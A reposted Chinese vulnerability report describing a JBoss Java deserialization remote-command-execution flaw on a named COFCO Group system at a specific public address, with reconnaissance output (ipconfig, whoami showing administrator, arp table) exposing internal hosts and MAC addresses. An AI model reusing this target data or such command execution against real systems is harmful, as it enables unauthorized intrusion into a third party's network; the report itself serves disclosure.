中粮集团旗下系统漏洞一枚(JAVA反序列化命令执行案例)
中粮集团旗下
https://106.39.17.117:8088/ESSSWebII/
jboss
JAVA反序列化命令执行
D:jboss-6.0.0.Finalbin>ipconfig/all
ipconfig/all
Windows IP 配置
主机名 . . . . . . . . . . . . . : HQ-SERVER46
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 未知
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : vmxnet3 Ethernet Adapter
物理地址. . . . . . . . . . . . . : 00-50-56-AE-00-07
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv4 地址 . . . . . . . . . . . . : 172.16.10.87(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.16.10.3
DNS 服务器 . . . . . . . . . . . : 172.16.10.35
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{97B40015-BA6E-4213-96E8-915CB41D6CFD}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 本地连接* 2:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interf
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
D:jboss-6.0.0.Finalbin>whoami
whoami
hq-server46administrator
D:jboss-6.0.0.Finalbin>arp -a
arp -a
接口: 172.16.10.87 — 0xe
Internet 地址 物理地址 类型
172.16.10.2 00-07-0e-34-f3-20 动态
172.16.10.3 ec-c8-82-e5-a8-70 动态
172.16.10.7 00-03-b2-9e-b3-c2 动态
172.16.10.12 00-50-56-ae-24-99 动态
172.16.10.16 00-50-56-ae-40-09 动态
172.16.10.19 00-50-56-96-7c-fc 动态
172.16.10.27 30-8d-99-a9-2e-fd 动态
172.16.10.34 00-50-56-ae-3f-fc 动态
172.16.10.35 00-50-56-ae-00-01 动态
172.16.10.38 00-50-56-96-38-8a 动态
172.16.10.41 ec-44-76-43-88-c0 动态
172.16.10.50 00-e0-ed-08-ae-76 动态
172.16.10.53 00-50-56-ae-00-1b 动态
172.16.10.59 00-50-56-85-4e-65 动态
172.16.10.70 00-50-56-85-5d-1b 动态
172.16.10.72 00-50-56-85-4d-27 动态
172.16.10.74 00-50-56-85-6a-14 动态
172.16.10.80 6c-0b-84-70-56-e0 动态
172.16.10.81 6c-ae-8b-77-a0-3c 动态
172.16.10.82 00-21-5e-54-89-0c 动态
172.16.10.84 34-40-b5-ab-49-b8 动态
172.16.10.89 00-50-56-ae-3f-c9 动态
172.16.10.90 00-50-56-96-0e-91 动态
172.16.10.104 00-50-56-ae-00-00 动态
172.16.10.106 00-50-56-85-35-51 动态
172.16.10.107 00-14-5e-2b-26-3c 动态
172.16.10.109 00-50-56-ae-00-0d 动态
172.16.10.111 00-50-56-85-37-b8 动态
172.16.10.123 d8-cb-8a-23-23-fe 动态
172.16.10.124 d8-cb-8a-23-23-b5 动态
172.16.10.126 00-50-56-85-4c-33 动态
172.16.10.129 00-50-56-96-30-4c 动态
172.16.10.144 00-50-56-85-46-ef 动态
172.16.10.171 00-50-56-85-56-12 动态
172.16.10.175 00-50-56-ae-3f-f5 动态
172.16.10.192 34-40-b5-a0-70-38 动态
172.16.10.226 00-50-56-ae-3e-e7 动态
172.16.10.229 00-50-56-ae-3e-e1 动态
172.16.10.255 ff-ff-ff-ff-ff-ff 静态
D:jboss-6.0.0.Finalbin>
解决方案:
升级
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/100212.html